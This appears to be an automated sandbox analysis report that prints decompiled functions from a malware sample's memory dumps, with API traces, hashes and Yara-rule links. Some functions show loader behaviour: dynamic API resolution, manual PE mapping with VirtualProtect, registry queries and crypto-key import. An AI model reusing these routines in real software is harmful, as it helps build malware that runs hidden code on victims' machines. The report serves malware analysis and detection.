Opcode Fuzzy Hash: 1645d101e2799a5d200b23cb4763175075e27da09864bda7bef4f60018523c05
Instruction Fuzzy Hash: 9C11A57660021EEBEB009BA5DEC7FA977A9EF04365F10006AE501D7190D676AD81BB21

Uniqueness

Uniqueness Score: -1.00%

Function 00FC779E, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC779E(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0xfca2d0; // 0x292d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0xfcba60; // 0x4f0053
				_v16 = 4;
				_t31 = E00FC4C7C(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0xfca2d0; // 0x292d5a8
					_t5 = _t19 + 0xfcbabc; // 0x6e0049
					_t34 = E00FC4C7C(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00FC2A03(_t34);
					}
					E00FC2A03(_t31);
				}
				return _v8;
			}

0x00fc77a4
0x00fc77a9
0x00fc77ae
0x00fc77b5
0x00fc77c1
0x00fc77c5
0x00fc77c7
0x00fc77cd
0x00fc77d9
0x00fc77dd
0x00fc77f0
0x00fc77f8
0x00fc780c
0x00fc7814
0x00fc7816
0x00fc7816
0x00fc781d
0x00fc781d
0x00fc7824
0x00fc7824
0x00fc782a
0x00fc782f
0x00fc7835

APIs

Part of subcall function 00FC4C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00FC77C1,004F0053,00000000,?), ref: 00FC4C85
Part of subcall function 00FC4C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00FC77C1,004F0053,00000000,?), ref: 00FC4CAF
Part of subcall function 00FC4C7C: memset.NTDLL ref: 00FC4CC3

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00FC77F0
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00FC780C
RegCloseKey.ADVAPI32(00000000), ref: 00FC781D

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: cd1c5c587d8f0449c9cb5c2d81bb4eb72271f6d60cc993355797a3de6a34db3c
Instruction ID: 438d23749d603b167cd2a73630eb6b56dd14aab5127e54fd9bc1c421a208d133
Opcode Fuzzy Hash: cd1c5c587d8f0449c9cb5c2d81bb4eb72271f6d60cc993355797a3de6a34db3c
Instruction Fuzzy Hash: 8F11657290020EBBD711EBD8DE8BFAEB7BCAF44704F140059B601E7061D774AA04EB65

Uniqueness

Uniqueness Score: -1.00%

Function 6E065A90, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 261memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,6E09E304,6E09E30C,6E5AD60C), ref: 6E065BA0

Strings

*, xrefs: 6E065D15

Memory Dump Source

Source File: 00000000.00000002.1182584056.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: *
API String ID: 544645111-163128923
Opcode ID: 09d7b9a43baecd1fd2e2c2f10d99bf052fa634b408aa3c5cbce8f40cafb077a4
Instruction ID: 1af9be0c50490d788411db38c00b1ab38a0aeee472bf7b6596d62abcdbc9949e
Opcode Fuzzy Hash: 09d7b9a43baecd1fd2e2c2f10d99bf052fa634b408aa3c5cbce8f40cafb077a4
Instruction Fuzzy Hash: DAD11674908518EFCB08CF99C198AACBBF2FF8A300F50E55AE445AB359D7345A42CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00FC7471, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00FC7471(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00FC344C(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xfca2d0; // 0x292d5a8
						_t20 = _t68 + 0xfcb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00FC2986(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00fc7477
0x00fc747a
0x00fc748a
0x00fc7493
0x00fc7497
0x00fc7565
0x00fc756b
0x00fc756b
0x00fc74b1
0x00fc74b6
0x00fc74ba
0x00fc74c0
0x00fc74c5
0x00fc74cc
0x00fc74db
0x00fc74db
0x00fc74df
0x00fc74e1
0x00fc74ed
0x00fc74f8
0x00fc7503
0x00fc7507
0x00fc7511
0x00fc7515
0x00fc7517
0x00fc751c
0x00fc7523
0x00fc7533
0x00fc7533
0x00fc751c
0x00fc7515
0x00fc7535
0x00fc753a
0x00fc753f
0x00fc753f
0x00fc7545
0x00fc754b
0x00fc7550
0x00fc7550
0x00fc7555
0x00fc755a
0x00fc755a
0x00fc7555
0x00fc74df
0x00fc755c
0x00fc7562
0x00000000

APIs

Part of subcall function 00FC344C: SysAllocString.OLEAUT32(80000002), ref: 00FC34A3
Part of subcall function 00FC344C: SysFreeString.OLEAUT32(00000000), ref: 00FC3508

SysFreeString.OLEAUT32(?), ref: 00FC7550
SysFreeString.OLEAUT32(00FC20DE), ref: 00FC755A

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: aca31e878eb577181e26921e45cee0a83668de96243e658407ad87c2ba6ea39a
Instruction ID: cf9991b7e68fbeb4f042f105c6e8c1d93ffa8bdd9d1896d15b17146f88eb50a8
Opcode Fuzzy Hash: aca31e878eb577181e26921e45cee0a83668de96243e658407ad87c2ba6ea39a
Instruction Fuzzy Hash: 1E317C7290021AAFCB15EF68CD89C9BBB79FFC97507184958F8159B210D631DD41EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC41D0, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xfca294) == 0) {
						E00FC1547();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xfca294) == 1) {
						_t10 = E00FC4430(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x00fc41d7
0x00fc41d8
0x00fc41db
0x00fc420d
0x00fc420f
0x00fc420f
0x00fc41dd
0x00fc41de
0x00fc41f3
0x00fc41fa
0x00fc41fc
0x00fc41fc
0x00fc41fa
0x00fc41de
0x00fc4217

APIs

InterlockedIncrement.KERNEL32(00FCA294), ref: 00FC41E5

Part of subcall function 00FC4430: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00FC4445

InterlockedDecrement.KERNEL32(00FCA294), ref: 00FC4205

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 5685b9ce93001b09268e61ec09d6a67ea41a7d754e6ef6b1cd90eaaf2fbbb3b1
Instruction ID: 055b297d02fa91e8a052469691b675386b06c40ac99cf590bf4eaab69471c9fe
Opcode Fuzzy Hash: 5685b9ce93001b09268e61ec09d6a67ea41a7d754e6ef6b1cd90eaaf2fbbb3b1
Instruction Fuzzy Hash: AFE04F316841275B862117749F1BFDEB660BF51BA8F00041CB84AD1051D664EC51FEE2

Uniqueness

Uniqueness Score: -1.00%

Function 6E051C12, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6E051C12(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6E051112( &_v8,  &_v12,  *0x6e0541cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6E051BCB(_t22, _v8,  *0x6e0541cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E6E051566(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6e054190, 0, _v8);
				}
				return _t25;
			}

0x6e051c12
0x6e051c15
0x6e051c16
0x6e051c2c
0x6e051c35
0x6e051c3a
0x6e051c53
0x6e051c3c
0x6e051c4f
0x6e051c4f
0x6e051c57
0x6e051c59
0x6e051c61
0x6e051c69
0x6e051c71
0x6e051c73
0x6e051c73
0x6e051c71
0x6e051c83
0x6e051c83
0x6e051c8e

APIs

StrStrIA.KERNELBASE(00000000,6E051810,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051C69
HeapFree.KERNEL32(00000000,?,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051C83

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a8c69f6fd2c161090299444506d1ca4a1b7494e1b1aed1173e03ca88bea29408
Instruction ID: 3cc8f4539aeacf67c67bfc5bc59ee2263e406133ad668edc347705e37db3ad55
Opcode Fuzzy Hash: a8c69f6fd2c161090299444506d1ca4a1b7494e1b1aed1173e03ca88bea29408
Instruction Fuzzy Hash: 64018476900915BB9B00CEE5CE54FDF7BFDEB89640F100161E601E7244D731DE159BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4BFF, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00FC4BFF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xfca2d0; // 0x292d5a8
				_t4 = _t15 + 0xfcb394; // 0x38f893c
				_t20 = _t4;
				_t6 = _t15 + 0xfcb124; // 0x650047
				_t17 = E00FC7471(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00FC4C7C(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00fc4c09
0x00fc4c0b
0x00fc4c12
0x00fc4c13
0x00fc4c14
0x00fc4c15
0x00fc4c1b
0x00fc4c20
0x00fc4c20
0x00fc4c2a
0x00fc4c3c
0x00fc4c43
0x00fc4c72
0x00fc4c45
0x00fc4c4a
0x00fc4c6f
0x00fc4c4c
0x00fc4c4f
0x00fc4c56
0x00fc4c61
0x00fc4c58
0x00fc4c5b
0x00fc4c5b
0x00fc4c65
0x00fc4c65
0x00fc4c4a
0x00fc4c79

APIs

Part of subcall function 00FC7471: SysFreeString.OLEAUT32(?), ref: 00FC7550

Part of subcall function 00FC4C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00FC77C1,004F0053,00000000,?), ref: 00FC4C85
Part of subcall function 00FC4C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00FC77C1,004F0053,00000000,?), ref: 00FC4CAF
Part of subcall function 00FC4C7C: memset.NTDLL ref: 00FC4CC3

SysFreeString.OLEAUT32(00000000), ref: 00FC4C65

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 0ffd64c4d4b1965e0613c7afc74072fcab99767642b0f45f963d74cca9cfe8da
Instruction ID: 13a8282ab231b621b80b35605c723783f2b9ea525dee116560fc7fb454980ce0
Opcode Fuzzy Hash: 0ffd64c4d4b1965e0613c7afc74072fcab99767642b0f45f963d74cca9cfe8da
Instruction Fuzzy Hash: 80019E3290102ABBCB11EBA4CE06EAEBBB8FB44710F004519EA11E3031D371AA10E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E051236, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E051236(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e0541cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0541cc - 0x63698bc4 &  !( *0x6e0541cc - 0x63698bc4);
				_t18 = E6E051AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0541cc - 0x63698bc4 &  !( *0x6e0541cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0541cc - 0x63698bc4 &  !( *0x6e0541cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E0514DE(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E051F31(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E051030(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E05136A(_t42);
					L8:
					return _t29;
				}
			}

0x6e05123e
0x6e051240
0x6e05125c
0x6e05126d
0x6e051274
0x6e0512d2
0x00000000
0x6e051276
0x6e051276
0x6e051280
0x6e051284
0x6e051289
0x6e05128c
0x6e051291
0x6e051295
0x6e05129a
0x6e05129f
0x6e0512a3
0x6e0512a8
0x6e0512a9
0x6e0512ad
0x6e0512b2
0x6e0512ba
0x6e0512ba
0x6e0512b2
0x6e0512a3
0x6e051295
0x6e0512bc
0x6e0512c5
0x6e0512c9
0x6e0512d3
0x6e0512d9
0x6e0512d9

APIs

Part of subcall function 6E051AA5: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E051272,?,?,?,?,00000002,00000000,?,?), ref: 6E051AC9
Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051AEB
Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B01
Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B17
Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B2D
Part of subcall function 6E051AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6E051B43

Part of subcall function 6E0514DE: memcpy.NTDLL(00000000,00000002,6E051280,?,?,?,?,?,6E051280,?,?,?,?,?,?,00000002), ref: 6E05150B
Part of subcall function 6E0514DE: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6E05153E

Part of subcall function 6E051F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E051F69

Part of subcall function 6E051030: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E051069
Part of subcall function 6E051030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0510DE
Part of subcall function 6E051030: GetLastError.KERNEL32 ref: 6E0510E4

GetLastError.KERNEL32(?,?), ref: 6E0512B4

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: f52aa438a766c335b5414470e7fe2c81a9ec8cca932a9dcab5885dee210a2292
Instruction ID: d774ba9ea69c9063aeeb1874a9291d248ae7b30bea0963dfb6b4ed83fd706814
Opcode Fuzzy Hash: f52aa438a766c335b5414470e7fe2c81a9ec8cca932a9dcab5885dee210a2292
Instruction Fuzzy Hash: 3D110876600B056BD7119EE9CE80FDB77BCAF583447040959E901D7745E7B0ED2A87A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC30AD, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC30AD(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E00FC4BFF(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E00FC5419(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0xfca290, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x00fc30b5
0x00fc310a
0x00fc310f
0x00fc30b7
0x00fc30d1
0x00fc30d5
0x00fc30da
0x00fc30dc
0x00fc30ec
0x00fc30f8
0x00fc30de
0x00fc30de
0x00fc30e1
0x00fc30e6
0x00fc30e6
0x00fc30dc
0x00fc30d5
0x00fc3115

APIs

Part of subcall function 00FC5419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,00FC2115,3D00FC90,80000002,00FC7319,00000000,00FC7319,?,65696C43,80000002), ref: 00FC545B
Part of subcall function 00FC5419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,00FC2115,3D00FC90,80000002,00FC7319,00000000,00FC7319,?,65696C43), ref: 00FC5480
Part of subcall function 00FC5419: RegCloseKey.ADVAPI32(80000002,?,00FC2115,3D00FC90,80000002,00FC7319,00000000,00FC7319,?,65696C43,80000002,00000000,?), ref: 00FC54B0

HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,00FC4A79,?,004F0053,038F9338,00000000,?), ref: 00FC30F8

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$CloseFreeHeap
String ID:
API String ID: 2109406458-0
Opcode ID: 14a782079fca729958bca54fe06ff6c663d586dee29ef171c85f056f0c0dde4a
Instruction ID: a5ddef66d72cb57f9c0081b8988e94f1b948febf2a8b27ed8c6ce4b80da1bb75
Opcode Fuzzy Hash: 14a782079fca729958bca54fe06ff6c663d586dee29ef171c85f056f0c0dde4a
Instruction Fuzzy Hash: 19011D3224024AFFCF129F54CD47FAA7B66FB947A0F18C42DFA198A161D671D920EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1AF1, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00FC1AF1(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E00FC35A1( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E00FC5C4E(_a8 + _a8);
					if(_t21 != 0) {
						E00FC4502(_a4, _t21, _t23);
					}
					E00FC2A03(_a4);
				}
				return _t21;
			}

0x00fc1af9
0x00fc1b00
0x00fc1b02
0x00fc1b11
0x00fc1b18
0x00fc1b27
0x00fc1b2b
0x00fc1b32
0x00fc1b32
0x00fc1b3a
0x00fc1b3f
0x00fc1b44

APIs

lstrlen.KERNEL32(00000000,00000000,00FC6301,00000000,?,00FC5B47,00000000,00FC6301,?,00000000,00FC6301,00000000,038F9630), ref: 00FC1B02

Part of subcall function 00FC35A1: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00FC1B16,00000001,00FC6301,00000000), ref: 00FC35D9
Part of subcall function 00FC35A1: memcpy.NTDLL(00FC1B16,00FC6301,00000010,?,?,?,00FC1B16,00000001,00FC6301,00000000,?,00FC5B47,00000000,00FC6301,?,00000000), ref: 00FC35F2
Part of subcall function 00FC35A1: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00FC361B
Part of subcall function 00FC35A1: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00FC3633
Part of subcall function 00FC35A1: memcpy.NTDLL(00000000,00000000,038F9630,00000010), ref: 00FC3685

Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 3ac217867511c38519daa93edfc20eaa0b62e784586314b26f9ebbf67c0ccf14
Instruction ID: af22a810389ddac2947c69431a97c3727306d55b25ffa90f837e39bf31762483
Opcode Fuzzy Hash: 3ac217867511c38519daa93edfc20eaa0b62e784586314b26f9ebbf67c0ccf14
Instruction Fuzzy Hash: 04F0543610010A7BCF116F65DD02EEB3B6DEF853A0B008015FD19CA111DA35DA55ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC5872, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00FC5872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00fc5872
0x00fc587f
0x00fc5880
0x00fc5881
0x00fc5888
0x00fc58b6
0x00fc58b7
0x00fc58ba
0x00fc58c0
0x00000000
0x00000000
0x00fc589f
0x00fc58a9
0x00fc58b0
0x00000000
0x00fc58a1
0x00fc58a4
0x00fc58c4
0x00fc58a6
0x00fc58a6
0x00000000
0x00fc58a6
0x00fc58a4
0x00fc58cb
0x00fc58d1
0x00fc58d1
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 00FC58BA

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 94525b31da8e73c77cbf439929a899f5343b2d5c2ab20cdad4f807c221a2a76d
Instruction ID: 3aa24395f71da6515b4bb1ce1c21367029f3d6564e0f33470997dc5bbe64c880
Opcode Fuzzy Hash: 94525b31da8e73c77cbf439929a899f5343b2d5c2ab20cdad4f807c221a2a76d
Instruction Fuzzy Hash: CEF01971D01619EBDB00DB94C989EEDB7B8EF04B05F1080AEE502A3180D3B46B84EB51

Uniqueness

Uniqueness Score: -1.00%

